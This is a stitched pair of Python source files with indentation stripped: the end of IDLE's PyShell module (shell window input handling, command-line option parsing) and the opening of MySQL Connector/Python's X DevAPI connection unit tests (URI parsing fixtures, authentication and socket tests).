# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
text = self.text
text.see("iomark")
ranges = text.tag_ranges("restart")
if not ranges:
return
restart_line = self.interp.get_restart_line()
for indx in range(len(ranges), 0, -2):
lineno = '%s.0' % str(ranges[indx - 1]).split('.')[0]
start, end = ('%s +1 line' % lineno, '%s +2 lines +1c' % lineno)
content = text.get(start, end)[4:].rstrip()
if content and content[:-2] != restart_line:
break
text.see(lineno)
def restart_shell(self, event=None):
self.stderr.signaled = False
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
class PseudoStderrFile(PseudoFile):
def __init__(self, shell, tags="stderr", encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self.signaled = False
def write(self, s):
if not self.signaled:
signal_err = idleConf.GetOption('main', 'General',
'signal-first-error', default=1, type='bool')
if signal_err:
self.shell.top.wakeup(anystate=True)
self.signaled = True
PseudoFile.write(self, s)
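# Illustrative sketch (not part of the original module): PseudoFile implements
# just enough of the file protocol (write/writelines/flush/isatty) for print
# statements and tracebacks to be routed into the shell window.  Any object
# with a write(s, tags) method can stand in for the shell:
class _DemoSink(object):
    def __init__(self):
        self.captured = []
    def write(self, s, tags=()):
        self.captured.append((tags, s))

def _demo_pseudofile_roundtrip():
    sink = _DemoSink()
    out = PseudoFile(sink, "stdout")
    out.write("hello\n")
    return sink.captured    # -> [("stdout", "hello\n")]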
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
test_mysqlx_connection.py
# -*- coding: utf-8 -*-
# Copyright (c) 2016, 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.connection
"""
import logging
import os
import platform
import unittest
import sys
import tests
import time
import string
import socket
import struct
import random
import mysqlx
from threading import Thread
from time import sleep
from . import check_tls_versions_support
from mysqlx.connection import SocketStream, TLS_V1_3_SUPPORTED, HAVE_DNSPYTHON
from mysqlx.compat import STRING_TYPES
from mysqlx.errors import InterfaceError, OperationalError, ProgrammingError
from mysqlx.protocol import (Message, MessageReader, MessageWriter, Protocol,
HAVE_LZ4, HAVE_ZSTD)
from mysqlx.protobuf import (HAVE_MYSQLXPB_CEXT, HAVE_PROTOBUF, mysqlxpb_enum,
Protobuf)
from mysql.connector.utils import linux_distribution
from mysql.connector.version import VERSION, LICENSE
if mysqlx.compat.PY3:
from urllib.parse import quote_plus, quote
else:
from urllib import quote_plus, quote
from .test_mysqlx_crud import drop_table
LOGGER = logging.getLogger(tests.LOGGER_NAME)
_URI_TEST_RESULTS = ( # (uri, result)
("127.0.0.1", None),
("localhost", None),
("domain.com", None),
("user:password@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33060,
"user": "user"}),
("user:password@127.0.0.1:33061", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33061,
"user": "user"}),
("user:@127.0.0.1", {"schema": "", "host": "127.0.0.1", "password": "",
"port": 33060, "user": "user"}),
("user:@127.0.0.1/schema", {"schema": "schema", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("user:@127.0.0.1/schema?use_pure=true", {"schema": "schema",
"host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user",
"use-pure": True}),
("user:@127.0.0.1/schema?compression=required", {"schema": "schema",
"host": "127.0.0.1",
"port": 33060,
"password": "",
"user": "user",
"compression": "required"}),
("user{0}:password{0}@127.0.0.1/schema?use_pure=true"
"".format(quote("?!@#$%/:")), {"schema": "schema", "host": "127.0.0.1",
"port": 33060, "user": "user?!@#$%/:",
"password": "password?!@#$%/:",
"use-pure": True}),
("mysqlx://user:@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("mysqlx://user:@127.0.0.1:33060/schema",
{"schema": "schema", "host": "127.0.0.1", "password": "", "port": 33060,
"user": "user"}),
("mysqlx://user@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1", None),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1",
{"schema": "", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1/schema",
{"schema": "schema", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("áé'í'óú:unicode@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "unicode",
"port": 33060, "user": "áé'í'óú"}),
("unicode:áé'í'óú@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "áé'í'óú",
"port": 33060, "user": "unicode"}),
("root:@[localhost, 127.0.0.1:88, [::]:99, [a1:b1::]]",
{"routers": [{"host": "localhost", "port": 33060},
{"host": "127.0.0.1", "port": 88},
{"host": "::", "port": 99},
{"host": "a1:b1::", "port": 33060}],
"user": "root", "password": "", "schema": ""}),
("root:@[a1:a2:a3:a4:a5:a6:a7:a8]]",
{"host": "a1:a2:a3:a4:a5:a6:a7:a8", "schema": "",
"port": 33060, "user": "root", "password": ""}),
("root:@localhost", {"user": "root", "password": "",
"host": "localhost", "port": 33060, "schema": ""}),
("root:@[a1:b1::]", {"user": "root", "password": "",
"host": "a1:b1::", "port": 33060, "schema": ""}),
("root:@[a1:b1::]:88", {"user": "root", "password": "",
"host": "a1:b1::", "port": 88, "schema": ""}),
("root:@[[a1:b1::]:88]", {"user": "root", "password": "",
"routers": [{"host": "a1:b1::", "port":88}], "schema": ""}),
("root:@[(address=localhost:99, priority=99)]",
{"user": "root", "password": "", "schema": "",
"routers": [{"host": "localhost", "port": 99, "priority": 99}]})
)
_ROUTER_LIST_RESULTS = ( # (uri, result)
("áé'í'óú:unicode@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "unicode", "user": "áé'í'óú"}),
("unicode:áé'í'óú@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "áé'í'óú", "user": "unicode"}),
("user:password@[127.0.0.1, localhost]", {"schema": "", "routers":
[{"host": "127.0.0.1", "port": 33060}, {"host": "localhost", "port":
33060}], "password": "password", "user": "user"}),
("user:password@[(address=127.0.0.1, priority=99), (address=localhost,"
"priority=98)]", {"schema": "", "routers": [{"host": "127.0.0.1",
"port": 33060, "priority": 99}, {"host": "localhost", "port": 33060,
"priority": 98}], "password": "password", "user": "user"}),
)
_PREP_STMT_QUERY = (
"SELECT p.sql_text, p.count_execute "
"FROM performance_schema.prepared_statements_instances AS p "
"JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
"AND t.processlist_id = @@pseudo_thread_id")
def file_uri(path, brackets=True):
if brackets:
return "{0}{1}".format(path[0], quote_plus(path[1:]))
return "({0})".format(path)
def build_uri(**kwargs):
uri = "mysqlx://{0}:{1}".format(kwargs["user"], kwargs["password"])
if "host" in kwargs:
host = "[{0}]".format(kwargs["host"]) \
if ":" in kwargs["host"] else kwargs["host"]
uri = "{0}@{1}".format(uri, host)
elif "routers" in kwargs:
routers = []
for router in kwargs["routers"]:
fmt = "(address={host}{port}, priority={priority})" \
if "priority" in router else "{host}{port}"
host = "[{0}]".format(router["host"]) if ":" in router["host"] \
else router["host"]
port = ":{0}".format(router["port"]) if "port" in router else ""
routers.append(fmt.format(host=host, port=port,
priority=router.get("priority", None)))
uri = "{0}@[{1}]".format(uri, ",".join(routers))
else:
raise ProgrammingError("host or routers required.")
if "port" in kwargs:
uri = "{0}:{1}".format(uri, kwargs["port"])
if "schema" in kwargs:
uri = "{0}/{1}".format(uri, kwargs["schema"])
query = []
if "ssl_mode" in kwargs:
query.append("ssl-mode={0}".format(kwargs["ssl_mode"]))
if "ssl_ca" in kwargs:
query.append("ssl-ca={0}".format(kwargs["ssl_ca"]))
if "ssl_cert" in kwargs:
query.append("ssl-cert={0}".format(kwargs["ssl_cert"]))
if "ssl_key" in kwargs:
query.append("ssl-key={0}".format(kwargs["ssl_key"]))
if "use_pure" in kwargs:
query.append("use-pure={0}".format(kwargs["use_pure"]))
if "connect_timeout" in kwargs:
query.append("connect-timeout={0}".format(kwargs["connect_timeout"]))
if "connection_attributes" in kwargs:
conn_attrs = kwargs["connection_attributes"]
if isinstance(conn_attrs, STRING_TYPES) and \
not (conn_attrs.startswith("[") and conn_attrs.endswith("]")):
query.append("connection-attributes={}"
"".format(kwargs["connection_attributes"]))
else:
attr_list = []
for key in conn_attrs:
attr_list.append("{}={}".format(key, conn_attrs[key]))
query.append("connection-attributes={0}"
"".format("[{}]".format(",".join(attr_list))))
if "tls-versions" in kwargs:
tls_versions = kwargs["tls-versions"]
if isinstance(tls_versions, STRING_TYPES) and \
not (tls_versions.startswith("[") and tls_versions.endswith("]")):
query.append("tls-versions=[{}]"
"".format(kwargs["tls-versions"]))
else:
query.append("tls-versions=[{}]".format(",".join(tls_versions)))
if "tls-ciphersuites" in kwargs:
tls_ciphers = kwargs["tls-ciphersuites"]
if isinstance(tls_ciphers, STRING_TYPES) and \
not (tls_ciphers.startswith("[") and tls_ciphers.endswith("]")):
query.append("tls-ciphersuites=[{}]"
"".format(",".format(tls_ciphers)))
else:
query.append("tls-ciphersuites=[{}]".format(",".join(tls_ciphers)))
if len(query) > 0:
uri = "{0}?{1}".format(uri, "&".join(query))
return uri
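# Illustrative usage sketch (example values are assumed): build_uri() above
# assembles an X DevAPI connection URI from keyword arguments.
def _demo_build_uri():
    uri = build_uri(user="root", password="s3cret", host="127.0.0.1",
                    port=33060, schema="test", connect_timeout=2000)
    # -> "mysqlx://root:s3cret@127.0.0.1:33060/test?connect-timeout=2000"
    return uri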
class ServerSocketStream(SocketStream):
def __init__(self):
self._socket = None
def start_receive(self, host, port):
"""Opens a socket to comunicate to the given host, port
Args:
host (str): host name.
port (int): host port.
Returns:
address of the communication channel
"""
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.bind((host, port))
# Starting receiving...
if sys.version_info > (3, 5):
my_sock.listen()
else:
my_sock.listen(1)
self._socket, addr = my_sock.accept()
return addr
class ServerProtocol(Protocol):
def __init__(self, reader, writer):
super(ServerProtocol, self).__init__(reader, writer)
def send_auth_continue_server(self, auth_data):
"""Send Server authenticate continue.
Args:
auth_data (str): Authentication data.
"""
msg = Message("Mysqlx.Session.AuthenticateContinue",
auth_data=auth_data)
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_CONTINUE"), msg)
def send_auth_ok(self):
"""Send authenticate OK.
"""
msg = Message("Mysqlx.Session.AuthenticateOk")
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_OK"), msg)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxSessionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
if os.name == "nt":
if "64" in platform.architecture()[0]:
self.platform_arch = "x86_64"
elif "32" in platform.architecture()[0]:
self.platform_arch = "i386"
else:
self.platform_arch = platform.architecture()
self.os_ver = "Windows-{}".format(platform.win32_ver()[1])
else:
self.platform_arch = platform.machine()
if platform.system() == "Darwin":
self.os_ver = "{}-{}".format("macOS", platform.mac_ver()[0])
else:
self.os_ver = "-".join(linux_distribution()[0:2])
license_chunks = LICENSE.split(" ")
if license_chunks[0] == "GPLv2":
self.client_license = "GPL-2.0"
else:
self.client_license = "Commercial"
def test___init__(self):
bad_config = {
"host": "bad_host",
"port": "",
"username": "root",
"password": ""
}
self.assertRaises(InterfaceError, mysqlx.Session, bad_config)
host = self.connect_kwargs["host"]
port = self.connect_kwargs["port"]
user = self.connect_kwargs["user"]
password = self.connect_kwargs["password"]
# Session to a farm using one of many routers (prios)
# Loop during connect because of network error (succeed)
routers = [{"host": "bad_host","priority": 100},
{"host": host, "port": port, "priority": 98}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Session to a farm using one of many routers (incomplete prios)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4000, err.errno)
# Session to a farm using invalid priorities (out of range)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": 101}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": "A"}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4002, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": -101}]
settings = {"user": user, "password": password, "routers": routers}
self.assertRaises(ProgrammingError, mysqlx.get_session, **settings)
try:
session = mysqlx.get_session(**settings)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": "A"}]
settings = {"user": user, "password": password, "routers": routers}
self.assertRaises(ProgrammingError, mysqlx.get_session, **settings)
try:
session = mysqlx.get_session(**settings)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
# Establish an Session to a farm using one of many routers (no prios)
routers = [{"host": "bad_host"}, {"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Break loop during connect (non-network error)
uri = build_uri(user=user, password="bad_pass", routers=routers)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Break loop during connect (none left)
uri = "mysqlx://{0}:{1}@[bad_host, another_bad_host]".format(user, password)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except InterfaceError as err:
self.assertEqual(4001, err.errno)
# Invalid option with URI
uri = "mysqlx://{0}:{1}@{2}:{3}?invalid=option" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
uri = "mysqlx://{0}:{1}@{2}:{3}?user=root" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
uri = "mysqlx://{0}:{1}@{2}:{3}?password=secret" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Invalid scheme
uri = "mysqlx+invalid://{0}:{1}@{2}:{3}" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Invalid option with dict
config = {
"user": user,
"password": password,
"host": host,
"port": port,
"invalid": "option"
}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Invalid option with kwargs
self.assertRaises(InterfaceError, mysqlx.get_session, **config)
# SocketSteam.is_socket()
session = mysqlx.get_session(user=user, password=password,
host=host, port=port)
self.assertFalse(session._connection.stream.is_socket())
def test_auth(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'native'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
sess.sql("CREATE USER 'sha256'@'%' IDENTIFIED WITH "
"sha256_password BY 'sha256'").execute()
config = {'host': self.connect_kwargs['host'],
'port': self.connect_kwargs['port']}
config['user'] = 'native'
config['password'] = 'test'
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
mysqlx.get_session(config)
config['user'] = 'sha256'
config['password'] = 'sha256'
if tests.MYSQL_VERSION >= (8, 0, 1):
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
self.assertRaises(InterfaceError, mysqlx.get_session, config)
sess.sql("DROP USER 'native'@'%'").execute()
sess.sql("DROP USER 'sha256'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"SHA256_MEMORY authentation mechanism not available")
def test_auth_sha265_memory(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'caching'@'%' IDENTIFIED WITH "
"caching_sha2_password BY 'caching'").execute()
config = {
"user": "caching",
"password": "caching",
"host": self.connect_kwargs["host"],
"port": self.connect_kwargs["port"]
}
# Session creation is not possible with SSL disabled
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["auth"] = mysqlx.Auth.SHA256_MEMORY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Session creation is possible with SSL enabled
config["ssl-mode"] = mysqlx.SSLMode.REQUIRED
config["auth"] = mysqlx.Auth.PLAIN
mysqlx.get_session(config)
# Disable SSL
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
# Password is in the cache, so session creation is possible
config["auth"] = mysqlx.Auth.SHA256_MEMORY
mysqlx.get_session(config)
sess.sql("DROP USER 'caching'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 15), "--mysqlx-socket option"
" tests not available for this MySQL version")
@unittest.skipIf(os.name == 'nt', "sockets not available"
" on windows")
def test_mysqlx_socket(self):
# Connect with unix socket
uri = "mysqlx://{user}:{password}@({socket})".format(
user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
socket=self.connect_kwargs["socket"])
session = mysqlx.get_session(uri)
# No SSL with Unix Sockets
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("OFF", res[0][1])
session.close()
# Socket parsing tests
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
